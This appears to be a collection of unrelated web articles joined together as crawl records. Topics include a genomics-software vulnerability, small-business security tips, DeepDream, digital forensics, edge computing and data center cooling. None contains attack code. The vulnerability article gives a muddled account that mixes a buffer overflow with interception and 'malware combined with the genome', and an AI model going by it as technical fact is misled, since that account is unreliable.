Some Sandia National Laboratories researchers discovered that the open software utilized by genomic researchers had a vulnerability. If an attacker exploits this vulnerability, he could access and modify sensitive genetic data.
There are two steps involved in DNA screening. The first step is the sequencing of a patient’s DNA and the mapping of their genome. The second step is the comparison of the patient’s genetic data with a standardized human genome using a software tool. The purpose of assessing any differences between the two is to find out if genetic differences are because of diseases.
The CVE-2019-10269 vulnerability discovered by Sandia researchers is a stack-based buffer overflow vulnerability. A lot of researchers use the Burrow-Wheeler Aligner (BWA) program for conducting medical diagnostics based on DNA. The vulnerability can be found when the BWA is importing from government servers the standardized human genome. Patient data is sent through an insecure channel and may be acquired in a man-in-the-middle attack.
The standardized human genome may be intercepted by an attacker and combined it with malware. Then, both the malware and genome are transmitted to the BWA user’s device. The installed malware could change the result of the patient’s DNA analysis at the time of genome mapping. Hence, the resulting DNA analysis may be inaccurate.
An attacker can change DNA mapping data so that a patient would appear to have no disease, and delay the receiving of treatment by the patient. The altered DNA analysis could also be made to show that a patient possesses a disease, and doctors may be led to give needless medications thus potentially harming the patient.
After the discovery of the vulnerability, Sandia informed the developer of the software and the U.S. Computer Emergency Readiness Team (US-CERT). A patch was developed by the software developer for the latest software version, and so far there are no reports showing that the vulnerability has been exploited in real-world attacks.
This is a critical vulnerability and has a CVSS v3 base score of 9.8 out of 10. An attacker with low-level skill can exploit the vulnerability.
All BWA program users need to update their software to the latest version immediately to stop future exploitation of the vulnerability. The researchers likewise advised developing a way to prevent the alteration of sequenced DNA data and using only secure, encrypted channels when sending sensitive data.
The researchers also told security researchers to assess genomics software program for comparable flaws. Although the BWA vulnerability has been solved, identical vulnerabilities may be present in other genomics mapping software programs. | <urn:uuid:88384954-d14b-4b98-b45b-4a595cf94422> | CC-MAIN-2022-40 | https://www.hipaanswers.com/researchers-found-critical-vulnerability-in-burrow-wheeler-aligner-genomics-mapping-software/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00387.warc.gz | en | 0.929883 | 527 | 2.953125 | 3 |
In participation with the National Cybersecurity Alliance and in celebration of Cybersecurity Awareness Month, CyberPolicy is proud to promote cybersecurity education by providing resources for small business owners to plan for, prevent, and insure against cyber crime.
Cybersecurity can be a complex and intimidating topic for many business owners. But, what may seem too large for any one person to solve can actually be a very manageable task with a little knowhow. In truth, the foundations of cybersecurity are decidedly non-technical and highlight the role of the individual internet user. With some basic understanding and a little guidance, you can see that cybersecurity relies on the collective actions of individuals within an organization rather than complex or expensive software.
Read on to learn how you can own your role in cybersecurity and strengthen the integrity of your operation.
Hackers are primarily after identity data, credit card information is their secondary target.
Identity data is any information that can be used to identify a specific user, employee, contractor, client, or consumer. This includes names, addresses, email addresses, social security numbers, and more. In many cases, a name, SSN and birthdate are enough to steal someone's identity causing immense financial and credit damage.
While stolen credit cards are bad news, stolen identity data such as medical records are much worse. Hackers love to pilfer healthcare information to resell on the dark web. Digital black-marketers actually prefer medical records to stolen credit cards. Credit cards can be canceled and they expire, offering a limited window of value. This is not the case for SSNs, names or birth dates, which live on indefinitely. Even a deceased person’s identity data can be used for nefarious purposes. If your business handles customer identity data, it is your job to protect that information.
Knowing exactly what cyber criminals are looking for makes it easier to safeguard that valuable information and protect your business. Here are handful of non-technical approaches that will enable your business to better shield identity data:
- Understand that not all data needs to be saved. Protect your customers by not saving some information. After all, it can't be stolen if you don't have it. Many CRM and POS applications collect more customer data than is needed to complete a transaction. Adjust the default settings of any apps that your business uses to retain only the information that is needed to process a transaction and maintain a relationship with a client.
- Train your staff to be skeptical. Phishing and social engineering scams are used by hackers to fool employees into sharing personal or financial information. Email is the primary tool that hackers use to deliver scams to unsuspecting recipients, so this is where you want to be on the lookout. Train your staff to identify suspicious emails. As a general rule: be wary of all messages from unknown senders and NEVER share information, click links, or download attachments from anyone that you don’t know.
- Silo your data based on who needs it most. Not every member of your organization needs access to identity data. Segment employee access on a need-to-know basis. Fewer access points to sensitive data offer fewer opportunities for a hacker to weasel in and cause problems.
Any business conducted online or with a connected device carries a certain set of risks. That’s the reality of the tech-enabled world that we work in today. Literally every company that hires employees or contractors, processes payments, or stores customer data needs to consider the possibility of a data breach. As a business owner, the outcome of any breach falls squarely on your shoulders. Data is one of the most valuable and vulnerable assets that any business manages. Unfortunately, many business owners don’t learn this fact until it's too late, because anytime there is a data breach, lawsuits can be expected to follow.
A cyber insurance policy covers your business in the event of a hack or data breach that results in financial damages - both direct and litigatory. This type of business insurance covers an organization’s intangible assets like digital files and data. Cyber insurance may seem novel to many business owners, but it has become a necessary form of coverage for companies that use the internet.
Common sense cybersecurity practices and training are the first line of defense. Cyber insurance is the final piece. Visit us online or give us a call at (800) 590-7292 to learn how cyber insurance can protect your business. | <urn:uuid:6a2c44c8-3aee-434e-9f80-83cd0361d805> | CC-MAIN-2022-40 | https://www.cyberpolicy.com/cybersecurity-education/the-importance-of-individuals-owning-their-role-in-cybersecurity | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335326.48/warc/CC-MAIN-20220929065206-20220929095206-00387.warc.gz | en | 0.938584 | 897 | 2.515625 | 3 |
A small group of Google software engineers have open sourced a new tool that can take an image and create an artistic spin on it using deep neural networks.
The sample code, which comes in an IPython Notebook, is based on Caffe, a deep learning framework developed by the Berkeley Vision and Learning Center. Deep learning uses artificial neural networks made up of many hidden layers between the input and output.
To use the tool, people will also need to set up NumPy, SciPy, PIL, and IPython, or a scientific Python distribution such as Anaconda or Canopy.
The tool constructs an image it is given layer by layer, starting out with a basic outline and then adding more detail as it moves through the deep layers of the neural network. In that process, users can decide which layer they want to enhance, how many iterations they want to apply on its own outputs, and how far they want to zoom in after each iteration to create their own remix of the original image.
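The released notebook is Caffe-based; purely to illustrate the loop described above, here is a heavily simplified sketch of the same idea in PyTorch (not the authors' code, and it omits the per-iteration zooming, octaves, jitter, and image normalization):

```python
import torch
from torchvision import models

model = models.googlenet(weights="DEFAULT").eval()
activations = {}
layer = model.inception4c  # the layer chosen for enhancement
layer.register_forward_hook(lambda m, i, o: activations.update(out=o))

img = torch.rand(1, 3, 224, 224, requires_grad=True)
for _ in range(20):                       # iterations on its own output
    model(img)
    loss = activations["out"].norm()      # amplify this layer's response
    loss.backward()
    with torch.no_grad():
        img += 0.05 * img.grad / (img.grad.abs().mean() + 1e-8)
        img.grad.zero_()
```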
The Google software engineers open sourced their tool for research purposes and to see what kind of art others could produce using it. They are encouraging people to post their art to Google+, Facebook, or Twitter with the hashtag #deepdream.
The software engineers can be contacted:
Alexander Mordvintsev, email@example.com
Michael Tyka, firstname.lastname@example.org
Christopher Olah, email@example.com | <urn:uuid:57b66d32-d5c9-483c-b963-16438c8a890b> | CC-MAIN-2022-40 | https://www.cio.com/article/202089/google-open-sources-neural-network-art-tool-deepdream.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00387.warc.gz | en | 0.937344 | 299 | 3.09375 | 3 |
Digital forensics: what is it and how does it work?
Modern society gives birth to modern crimes. Unfortunately, that means criminals and threat actors of the day are attempting to harm users as they browse blogs, shop online, and scroll social media on their smartphones. As a result, digital forensics is becoming a growing, necessary part of how our world works.
But what is digital forensics? How does it work? Discover the answers to these two questions and more by diving into the article below.
What is digital forensics?
Digital forensics – or computer forensics – is the science of collecting, preserving, and analyzing digital data so that it can be used as evidence in a court of law.
This data can come from any number of electronic sources, including a laptop, computer, smartphone, server, or data network. Professionals in this field cooperate with a larger forensics team to aid in navigating, inspecting, and analyzing these data sources in a larger criminal investigation.
What are the branches of digital forensics?
There are five different branches to consider within the broader field of digital forensics. Although digital forensics is sometimes called cyber forensics, the process doesn’t solely deal with computers.
The five main branches of this important criminal science are:
- Database Forensics – focusing on databases and associated metadata, database forensics handles multiple aspects of data. Investigators may analyze transactions within a database, or review timestamps to verify a particular timeline of user interactions.
- Computer Forensics – solely focuses on evidence found on computers and in digital storage media. This branch combines traditional data recovery measures with proper legal procedures to support both criminal and civil cases.
- Network Forensics – this is the most fast-paced branch of digital forensics. Once data has been transmitted across a network, it’s gone. As a result, network forensic investigations tend to be more proactive than reactive.
- Mobile Device Forensics – the increased use and intricate nature of mobile devices has increased demand for professionals in this branch. This style of forensics involves navigating complex technologies like GPS and hibernation in any device with internal memory and communication platforms, not just smartphones.
- Forensic Data Analysis – investigators primarily focus on the analysis of structured data regarding financial institutions. The goal is to discover patterns, trends, or spot fraudulent activity by applying keyword searches or data mapping techniques.
Initially, digital forensics was done by skilled IT system administrators with general computer science knowledge, certifications, and training. But as the need for cybersecurity and digital forensics grew, and digital crimes became more complex, these five cyber forensics specializations became necessary.
How does digital forensics work?
The science of digital forensics relies on the concept of our digital footprint. Unknown to us, every move we make on the internet leaves a trace.
Every time you visit a website, shop online, or send a tweet, a “paper trail” develops. Essentially, we all have digital records of our internet activity out there on the world wide web. Professionals in the field of computer forensics can take that data, analyze it, and produce solid evidence for criminal or civil cases being tried in a court of law.
A cyber investigator may be asked to recover deleted files, restore a damaged hard drive, crack encrypted passwords, discover the source of a security breach, and more. The tools needed to perform these tasks effectively can be complex: packet scrapers, analysis tools for multiple devices and communication platforms, data capture tools, and file viewers are just some of the tools digital forensics investigators have at their disposal.
What are the phases of digital forensics?
Taking digital data in its raw form and turning it into viable evidence to be used by law enforcement can be complex. Generally, the overall process usually follows four distinct phases.
The cyber investigation process starts with taking possession of the device in question. Law enforcement officials obtain a warrant and then physically take possession of the device holding the digital evidence. Law enforcement's involvement is a crucial part of this step, as it maintains the appropriate chain of custody for the evidence.
Once the raw data is physically in possession of law enforcement, cyber investigators work to duplicate files pertaining to the case. This is done using a hard drive duplicator or software imaging tool. Once the copy of the data is created, the original drive is stored safely and securely. At the same time, the digital evidence goes through several stages of validation to make sure it’s still in its original state.
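As a simple illustration of that validation, here is a sketch of how an investigator might confirm that a working copy still matches the original image by comparing cryptographic hashes (the file paths are hypothetical):

```python
import hashlib

def sha256_of(path, chunk_size=1 << 20):
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        # Stream the file in chunks; disk images are far too big for memory.
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

# Matching digests indicate the working copy is bit-for-bit identical.
assert sha256_of("evidence/original.img") == sha256_of("evidence/copy.img")
```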
At this point in the process, cyber investigators will review the files copied from the original hard drive to see if they support or refute the charges brought against the accused. The investigator will call on various skills to analyze this data and get a complete picture of what actually happened during the events in question. Typically, this requires recovering deleted files, reviewing documents and internet history, chat logs, email, and may even require investigators to dig into the computer’s operating system cache.
Once this data is mined and collected, it’s then translated and made presentable for court. It would be hard for police or attorneys to use in its raw form, so part of a cyber investigator’s job is to make this digital evidence relatable and understandable to non-IT members of the court system. From there, it’s examined further and hopefully will help prosecutors and law enforcement bring the alleged crime to a speedy resolution.
This step is a crucial part of what cyber forensics is. Without it, all of the effort seizing, acquiring, and analyzing the raw data would be wasted.
Why is digital forensics important?
The data recovery measures that are possible via computer forensics can play a crucial role in helping to bring threat actors to justice.
Often, hackers will attempt to destroy data or “cover their tracks” after committing a cybercrime or data breach. Destroying data may even be the technique they choose to harm their targets.
The efforts of cyber investigators can be instrumental in recovering or repairing the data involved in a cybersecurity event. Not only can these professionals repair or recover the data in question, but they can also identify any data that’s been removed from the system by cybercriminals. Considering how important and sensitive data has become in our modern world, digital forensics is an essential line of defense.
How can MSPs implement digital forensics for their clients?
As an MSP, your primary function is protecting your clients’ data. However, no one is perfect. Despite the lengths you may go to in protecting your clients’ network, cyberattacks are inevitable.
Digital forensics can be a valuable tool in helping MSPs strengthen their clients’ networks. The recovered or analyzed data can help you discover weaknesses in an organization’s cybersecurity protocols and take the steps necessary to strengthen them. Security information and event management (SIEM) tools are often a part of these protocols.
In the event of a cyber-attack, MSPs are also on the front lines. As the party responsible for their clients’ cybersecurity management, it falls on them to act quickly and immediately salvage any digital evidence. Doing so and managing the aftermath is the most critical part of any cybercrime investigation, whether this applies to email, ransomware, or other attacks.
What role does digital forensics play in cybersecurity?
Digital forensics and cybersecurity often overlap as digital forensics plays an important role in your threat response. It can’t be used to prevent an attack from happening, but it’s an important part of recovering afterward.
When an attack does happen to penetrate an organization’s cybersecurity measures, the information you learn from your digital forensics efforts can also be studied to prevent future attacks.
You’ll also be able to offer your clients the utmost protection by leveraging digital forensics to see if there is still suspicious activity within the system. From there, you can suggest steps your clients can take to neutralize these threats and reduce dwell time in the future.
Follow the footprint
Using digital forensics effectively is all about following the digital footprint. MSPs play an important role in what computer forensics is since they are the first line of defense for data protection. Organizations should take the time to make sure their MSP is an expert in the field and can provide the quick response necessary to save data and, ultimately, bring hackers to justice.
Are you ready to help your clients enhance their cybersecurity and stop threat actors in their tracks? Contact ConnectWise today for more information and to see the cutting-edge tools we have to offer. | <urn:uuid:52222ed3-63b9-4c32-a06f-b18a43c66468> | CC-MAIN-2022-40 | https://www.connectwise.com/cybersecurity-center/glossary/digital-forensics | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00387.warc.gz | en | 0.91939 | 1,936 | 3.15625 | 3 |
Multi-access edge computing (MEC), known by many by its previous name, mobile edge computing, is a network architecture that gives network operators and service providers cloud computing capabilities as well as an IT service environment at the network edge. The concept of MEC has grown increasingly popular over the past few years, with the curiosity of many interested parties snowballing alongside the expansion of the Internet of Things (IoT). In this three-part series of articles on MEC, we’ll look at how multi-access edge computing works, the security challenges it faces and how it can be protected and secured, and how it will be used to improve the networks and services of tomorrow.
Multi-access edge computing is currently one of the most popular topics for discussion when it comes to the technologies that will enable network operators and service providers to realize the potential of both enhanced network architectures and the Internet of Things.
Having had its name changed from mobile edge computing to multi-access edge computing by the European Telecommunications Standards Institute (ETSI) to allow for a more heterogeneous approach, MEC has now opened up avenues beyond mobile, into Wi-Fi and other access technologies.
In this, the first of three articles looking at multi-access edge computing, we’ll be taking a look at how MEC has come about and how it works as well as taking a look at some examples of how it is being used today. So, let’s start with why MEC?
Why Multi-Access Edge Computing?
While initially showing great promise in mobile technologies, edge computing has since gone on to demonstrate how it could also be applied to other access technologies such as Wi-Fi with at least similar, if not greater levels of success.
For example, much of the data created by IoT and smart devices needs to be collected and responded to in close to real time. Data-generating processes such as network services, connected manufacturing equipment, automated critical infrastructure, or automated vehicles could all have significant impacts on network operators and service providers, manufacturing and utility operations, and even people's lives if data processing delays impede their ability to function appropriately.
In order to combat network latency and enable enhanced performance and next-gen network services and functions, operators and service providers are looking to multi-access edge computing to transform the current landscape.
The logic behind MEC is simple enough. The further from the data source that processing, analysis, and storage take place, the higher the latency experienced.
By processing, analyzing and storing the data generated at the very edge of the network, operators and providers can deliver enhanced response times and improved services while also laying the groundwork for more advanced concepts such as driverless vehicles and enhanced automation.
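As a rough illustration of why proximity matters, consider propagation delay alone. The distances and fiber speed below are illustrative; real latency also includes processing and queuing time:

```python
# Light travels through fiber at roughly two-thirds the speed of light.
SPEED_IN_FIBER_KM_PER_S = 200_000

for label, distance_km in [("nearby edge node", 10),
                           ("distant cloud region", 1500)]:
    rtt_ms = 2 * distance_km / SPEED_IN_FIBER_KM_PER_S * 1000
    print(f"{label}: ~{rtt_ms:.2f} ms round-trip propagation delay")
```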
The Benefits of MEC
The benefits of multi-access edge computing can be found in various places and applications. The most obvious are the way in which it allows network operators and service providers to reduce latency in the services in order to enhance overall customer experiences alongside the ability to introduce new, high-bandwidth services without the previously mentioned latency issues.
Both of these are great ways to apply MEC in order to enhance businesses and industrial operations, however, there are other benefits to multi-access edge computing, too.
Security is also one of the advantages of multi-access edge computing, as many MEC systems utilize local, private connections to ensure data security. As well as security, multi-access edge computing systems can be integrated into virtually any network infrastructure, whether Wi-Fi, cellular, or a combination of the two.
The increased availability of IT resources and applications alongside the ability to run higher-bandwidth network process looks set to further increase technological innovations in the field and help produce the MEC networks of the future.
Emerging technologies such as autonomous vehicles will rely on real-time data analytics in order to function safely, something that multi-access edge computing, it is suspected, will help to enable.
While MEC is still in its infancy, there are several use cases we can draw upon to further improve our understanding of how multi-access edge computing works in real-world scenarios. The following three use cases showcase how network operators and service providers hope MEC architectures will be used in the future.
In industrial use cases, the distributed cloud environment that multi-access edge computing is able to provide would become invaluable for the various applications it then enabled. In the case of critical infrastructure, real-time data analytics could potentially stave off malfunctions and unnecessary repairs by informing engineers of any anomalies as they occur.
Much like its industrial use cases, MEC brings many of the same benefits to enterprise environments. Security and surveillance, for example, could be greatly enhanced if data was processed, stored and analysed closer to the source, improving overall security. The same is true for behavioral analytics of customers in the retail industry, for example.
In the entertainment industry, multi-access edge computing could be utilized to provide even greater customer experiences as is happening in areas such as stadium and venue sports, events and performances. Multi-player or action cams and other such services could be provided without the typically associated bandwidth and latency issues that have plagued these ideas for so long.
In part two of this three-part series on MEC, we'll take a look at the security challenges faced by multi-access edge computing and try to understand how MEC might best be protected from them.
Imagine a microwave that doesn’t warm your food, but scans it instead and instantly reveals how many calories it has. Thanks to General Electric, who are currently working on a machine that does exactly that, this technology will soon be a reality. This new microwave’s concept design can be found all over the web, but the final name and look is yet to be revealed.
How does it work?
Despite being called a microwave, this new version works in a completely different way than what we’re used to. It doesn’t cook the food, for one. Instead, it uses low energy microwaves to “scan” the food to determine its caloric content. The machine does this by measuring three main components: the weight, fat content, and water content.
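GE has not published the model its prototype uses, so the sketch below is purely illustrative: it applies standard Atwater energy factors (roughly 9 kcal per gram of fat and 4 kcal per gram of other solids, with water contributing nothing) to the three measured components, and the example quantities are made up:

```python
def estimate_calories(weight_g, fat_g, water_g):
    """Rough calorie estimate from weight, fat content and water content.

    Assumes the non-fat, non-water remainder is protein or carbohydrate
    at ~4 kcal/g, with fat at ~9 kcal/g (standard Atwater factors).
    """
    other_solids_g = max(weight_g - fat_g - water_g, 0)
    return 9 * fat_g + 4 * other_solids_g

# e.g. 300 g of soup containing 10 g of fat and 260 g of water:
print(estimate_calories(300, 10, 260))  # 9*10 + 4*30 = 210 kcal
```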
At this stage of product development, it only works on purees, liquids and blended food. The technology is still being developed to eventually work on solid food.
Calorie counting made easy
When it comes to losing weight, one of the key rules to follow is to aim for a calorie deficit. This means cutting back on calories consumed and spending more calories through exercise. This new technology opens up opportunities for people to easily track the calories in the food they eat, helping them make better choices and paving the way towards better eating habits.
GE’s new microwave holds a great deal of promise since traditional calorie-counting methods involve a lot of research and keeping track of everything is tedious and time consuming. With this machine, all that hassle can be eliminated since it’ll get the job done in just a couple of seconds.
This is exciting stuff and definitely something to look forward to. GE's research and development team led by biologist Matt Webster says that the finished product will probably be available to consumers in a couple of years or so.
Why can't servers run in the desert with no air conditioning? And why can't data center managers automatically ramp processor power usage up and down to match their workloads? Those questions were debated by some of the world's leading data center experts Wednesday at the Technology Convergence Conference in Santa Clara, Calif. The surprising answer: some of these scenarios are closer to reality than you think.
Take the data center in the desert. Subodh Bapat, the former VP of Energy Efficiency at Sun Microsystems, shared an anecdote about a data center user in the Middle East that wanted to test server failure rates if it operated its data center at 45 degrees Celsius - that's 113 degrees Fahrenheit.
Testing projected an annual equipment failure rate of 2.45 percent at 25 degrees C (77 degrees F), and then an increase of 0.36 percent for every additional degree. Thus, 45C would likely result in an annual failure rate of 11.45 percent. "Even if they replaced 11 percent of their servers each year, they would save so much on air conditioning that they decided to go ahead with the project," said Bapat. "They'll go up to 45C using full air economization in the Middle East."
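The quoted figures imply a simple linear model, restated below. Note that applying 0.36 percent per degree across the 20-degree span from 25C to 45C strictly yields 9.65 percent; the 11.45 percent figure corresponds to a 25-degree rise, so one of the quoted numbers appears to be off:

```python
def annual_failure_rate(temp_c, base_rate=2.45, base_temp_c=25.0, pct_per_degree=0.36):
    """Linear annual equipment failure rate (percent) implied by the quoted figures."""
    return base_rate + pct_per_degree * (temp_c - base_temp_c)

print(annual_failure_rate(45))  # 9.65 -- the quoted 11.45 matches a 25-degree rise
```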
eBay: Free Cooling in Phoenix
One of the largest Internet e-commerce operations is pursuing a similar strategy in the U.S. eBay will use fresh air cooling in its new modular data center in Phoenix, where the average temperature exceeds 100 degrees in the summer. Dean Nelson, Senior Director of Global Data Center Services at eBay, says the servers can handle it if the facility is designed correctly.
“The reality is that the manufacturers baby the servers," said Nelson. "That’s the truth."
Raising the baseline temperature inside the data center can save energy used to operate chillers (air conditioning systems) by enabling more extensive use of “free cooling,” the use of fresh air from outside the data center. Free cooling is typically implemented in cool climates, but eBay isn't alone in hoping to extend the areas where it can be implemented.
"If we can get the manufacturers to design for higher temperatures, you could operate IT equipment anywhere without a chiller,” said Bill Tschudi, progam manager at Lawrence Berkeley National Labs.
More Granular Server Management
But nudging the thermostat higher is only appropriate for companies with a strong understanding of the cooling conditions in their facility. Just about all of the panelists at the Technology Convergence Conference were eager for more tools to provide granular management of server performance and power usage.
Nelson noted recent research from Data Center Pulse that identified potentially significant power savings from dynamically adjusting the clock speed of CPU processors to match IT workloads. The group's testing suggests that overclocking and underclocking processors as workloads fluctuate can reduce a server’s energy use by as much as 18 percent.
"There are huge potential reductions (in energy usage) available," Nelson said. "Why can’t we have control over that chip? Why can’t we have the controls to give us a gas pedal, so that we can throttle up and throttle back?"
“You should be able to scale down your energy use," agreed Mukesh Khattar, Energy Director at Oracle Corp. "That will give you more savings than anything else. If your servers are doing zero percent work, they should be using zero percent power. But they’re not. (Power usage at idle) is closer to 80 percent."
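On Linux servers, a crude version of this gas pedal already exists in the kernel's cpufreq subsystem. The sysfs paths below are the standard ones, but available governors vary by driver and kernel, writing these files requires root, and the load threshold is an invented illustration rather than a recommended policy:

```python
import os

CPUFREQ = "/sys/devices/system/cpu/cpu0/cpufreq"  # one directory per logical CPU

def read(name):
    with open(os.path.join(CPUFREQ, name)) as f:
        return f.read().strip()

def set_governor(governor):
    # Typical governors include "performance", "powersave" and "ondemand";
    # check scaling_available_governors for what this platform supports.
    with open(os.path.join(CPUFREQ, "scaling_governor"), "w") as f:
        f.write(governor)

def throttle_for_load(load_pct):
    """Toy policy: run flat out when busy, pin the clock low when idle."""
    set_governor("performance" if load_pct > 60 else "powersave")

print(read("scaling_cur_freq"))  # current clock speed in kHz
throttle_for_load(load_pct=15)   # idle-ish workload -> powersave
```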
The Processor Perspective
It's possible to tweak servers to match processor function to workloads, as Data Center Pulse proved in its testing. "There's lots of knobs inside a server design you can tweak to enhance its performance and manage its power," said Bapat.
The processor perspective was shared by Henry Wong, Senior Staff Technologist at Intel, who was sympathetic to data center executives' yearnings for advanced power management tools. But that doesn't mean it's a simple problem to solve.
"Having many knobs makes it really difficult for IT managers," said Wong. "To provide this level of control, you’ve got to automate it.”
Wong favors an approach that uses policies that can be translated into granular server settings. "That's one of the technologies we're trying to build in," said Wong. "To get to that nirvana requires a lot of effort. And no one policy is going to fit everyone. We're trying to build in these heuristics and artificial intelligence. But it's still a few years away."
Australian Researchers Harnessing Spin-Orbit Coupling: Scaling Up Quantum Computation
(Phys.org) A team of Australian scientists led by Professor Sven Rogge at the Centre for Quantum Computation and Communication Technology (CQC2T) has investigated the spin-orbit coupling of a boron atom in silicon. Spin-orbit coupling, the coupling of a qubit's orbital and spin degrees of freedom, allows the qubit to be manipulated via electric, rather than magnetic, fields. "Single boron atoms in silicon are a relatively unexplored quantum system, but our research has shown that spin-orbit coupling provides many advantages for scaling up to a large number of qubits in quantum computing," says Professor Rogge, Program Manager at CQC2T.
The utilization of the spin-orbit coupling of atom qubits has added a new suite of tools to the quantum armory. Using the electric dipole coupling between qubits means they can be placed further apart, providing flexibility in the chip fabrication process in the future. "Boron atoms in silicon couple efficiently to electric fields, enabling rapid qubit manipulation and qubit coupling over large distances. The electrical interaction also allows coupling to other quantum systems, opening up the prospects of hybrid quantum systems," says Rogge.
Industry 4.0 has ushered in new important technologies such as wearables and the Internet of Things (IoT), and they are already transforming business as usual by increasingly allowing for the automatic control of everything – from construction to production to logistics. Connected devices are just about everywhere, and beyond business, they are transforming our lives.
The number of interconnected digital and electronic devices in operation globally is nearly twice the number of people on the planet – 13 billion devices. From vending machines, factories and logistics to smart cars, smart homes and smart cities, the devices are talking to each other. Now more than ever manufacturers need to take measures to ensure that sufficient interoperability, privacy and security is in place to find continued consumer acceptance, and pre-market testing can help.
Internet of Things (IoT) is a megatrend that manufacturers cannot afford to ignore. It is expected that IoT will connect as many as 28 billion devices by 2020, from wearables to smart home devices to connected cars. Interoperability plays an important role to help IoT reach its full market potential. IoT devices rely on various protocols to “talk to” each other and the internet.
To many, interoperability is just a "check the box" item on an organisation's to-do list. What they don't realise is that interoperability has the potential to unlock more than $4 trillion from IoT usage by 2025. According to PWC's Connected Home 2.0 Report, households will spend approximately £10.8bn on smart devices in 2019, and interoperability will be key to this adoption.
Though interoperability is invisible to the consumer, it is essential that manufacturers ensure their IoT devices can communicate seamlessly. Consumers want products that are simple to use, reliable and compatible with their existing high-functioning electronic devices. If a gadget can't receive and process information and act upon that information, the product won't work as consumers expect it to. Unintended interaction between any electronics and emissions from the equipment can have an adverse impact on other electronic devices or radio systems – and without full functionality, the product may not provide value.
In 2017, TechUK's State of the Connected Home Report found that 16 per cent of people are apprehensive about the ability of technology to communicate across different systems. The expectations for connecting products to smart homes, smart cars and smart cities are high. Consumers request out-of-the-box functionality - wanting interoperability - which encompasses multiple devices and settings, with little or no extra configurations. This introduces both technical and communication challenges for the industry around what devices operate in which ecosystem. Helping to ensure cross-protocol communication and maintaining connectivity strength and secure connections is key to safer and more secure products.
Privacy and safety
For now, interoperability issues among smart devices have largely been contained to performance. However, what happens when communication discrepancies bleed into privacy and safety, like having a security camera hacked or a broken smoke alarm? PWC's report also shows that privacy concerns represent a significant barrier to adoption for 22 per cent of consumers who do not already own smart technology. This is particularly true for data, as consumers are becoming more aware of the power of data, the security of data and how that data is used. Establishing standard operating frameworks will help address the issue of interoperability and aid continuous data sharing amongst devices, stakeholders and locations.
Despite significant consumer scepticism about smart device security, artificial intelligence is giving us new means of combating cyber threats by outwitting them. The security of connected consumer devices is not just a matter of interest to the customers who use these devices; it is increasingly becoming a matter of national interest. Malware that can take control of, and subvert the operation of, connected systems has been used to launch some of the largest attacks on the Internet that have ever been seen. The connected nature of these systems also means security must be considered for any 'apps' that run on separate systems (such as the consumer's phone), as well as 'cloud' services.
With more and more products needing wireless capability to compete in a rapidly changing market place, there is a need to make sure products function both safely and flawlessly in real-world environments. Without external support, it can be difficult to predict what sources of error, interference and, thus, dissatisfaction may appear when a device gets into the hands of real users. Whatever the innovation, whatever the product, it cannot succeed if it is not safe. This is why pre-market testing is so important to helping ensure product safety.
For manufacturers, the future potential is clear and present, but great opportunity is sometimes accompanied by great risk. To address the challenges within interoperability, privacy and safety, proper testing is important to help organisations avoid the unfortunate consequences of overlooked details.
Across connected devices, companies should not only test all electromagnetic compatibility (EMC) and wireless requirements to make sure devices are properly communicating during normal operating conditions, but also look at what happens when the Wi-Fi goes down, when there is a low internet signal, when the power goes out, and all possible scenarios which may affect connected devices.
Manufacturers need to be ready to understand market demands, keep up with the latest technology and innovations and be certain their products are ready for the market. Smart cars, smart homes and smart cities are ripe for innovation, but successful innovation is more than having a clever idea. It means being able to transform that idea into a product that meets a perceived need at a particular time, is safe for consumers and works well.
As such, interoperability provides the opportunity for major and rapid growth. Testing can not only save significant resources in the long term, but also help to create better product reviews, loyal customers and increased sales. Whatever the industry, that trust is a fragile thing. Consumers must believe in a brand, and a product. They must believe that performance will occur as promised. And safety is ensured. Trust in product and company safety, security, quality and sustainability, is vital.
Phil Davies, EMEA-LA general manager, UL
I borrowed the term opportunity costs from economics. Opportunity costs occur whenever there is a tradeoff between two options. For example, either one of two things can be done, A or B. If you decide for A, then the benefits of B cannot be realized. These lost benefits of B are the opportunity costs of choosing A.
Such decisions have to be made constantly in the development process. Let’s imagine that we have a data science problem to solve. Should we use Python or Java as a programming language? With Python, our developers would be five times faster for this particular problem, but we do not have Python programmers in the team. Do we hire some? Train the existing staff? Offer training on the job? Or do we go for Java after all, despite the downsides?
Another example: Should we use a software library or write the code ourselves? A software library brings a lot of functionality, but we must learn how to use it and adapt our code to it. Writing the code ourselves harbors the risk that more requirements might come in later and, in the end, we would have recreated the complete library.
There are tons of these decisions in every project – and there’s more.
Opportunity costs of communication
I am sure everybody has noticed that when a software project starts, a first working prototype is built in days or weeks, yet the complete product takes months or even years. This is due to the additional requirements in an enterprise-grade tool, summarized in the Pareto principle: It takes 80 percent of the costs to implement the last 20 percent of the product.
But there is another effect in motion: The costs of communication. A programmer can code for eight hours a day. Ideally, they must remain focused for that time. But what does a normal day really look like? A half-hour Scrum meeting at 9am. After, the developer has scarcely enough time to start thinking about the problem at hand before being interrupted at 10am by a meeting about an architecture detail that will impact everybody. From 11am onward, they start thinking about the problem again, write a few lines of code – at 12pm, it’s lunch time. Day in and day out the entire development process is interrupted, and eight-hour days are essentially reduced to one to two hours of actual work. Communication does have huge opportunity costs.
Yet, no communication at all also creates opportunity costs. We have all seen projects fail where each individual member made good progress, but in the end no product came out of it. I was genuinely shocked by the development speed I was able to achieve in my own company compared to when I was an employee: a factor of about five.
Risks are opportunity costs
Another mistake I often see is forgetting to evaluate the inherent risks of choosing option A or B. Using my above example of Python versus Java, training the team to use Python involves risks. After the training, the developers will be junior developers for Python, regardless of their experience in Java. The risk of creating sub-optimal code is huge, plus the development speed will be lower. Both are due to the lack of experience in Python.
Will the developers love Python and be highly motivated? Nobody knows in advance. Did we falsely assume the product can be built in Python more efficiently, simply because there had been no prior experience with Python and the downsides it has in other areas? Hard to tell. If we choose Java, the risk is low. We know what lies ahead of us, we are certain about the development time it will take. Is the risk of choosing Python worth it?
When making such decisions, the list of pros and cons should always have a probability attached to it. How long does it take to build in Python? One week. In Java? Two months. How certain is the team this statement is true? 50 percent.
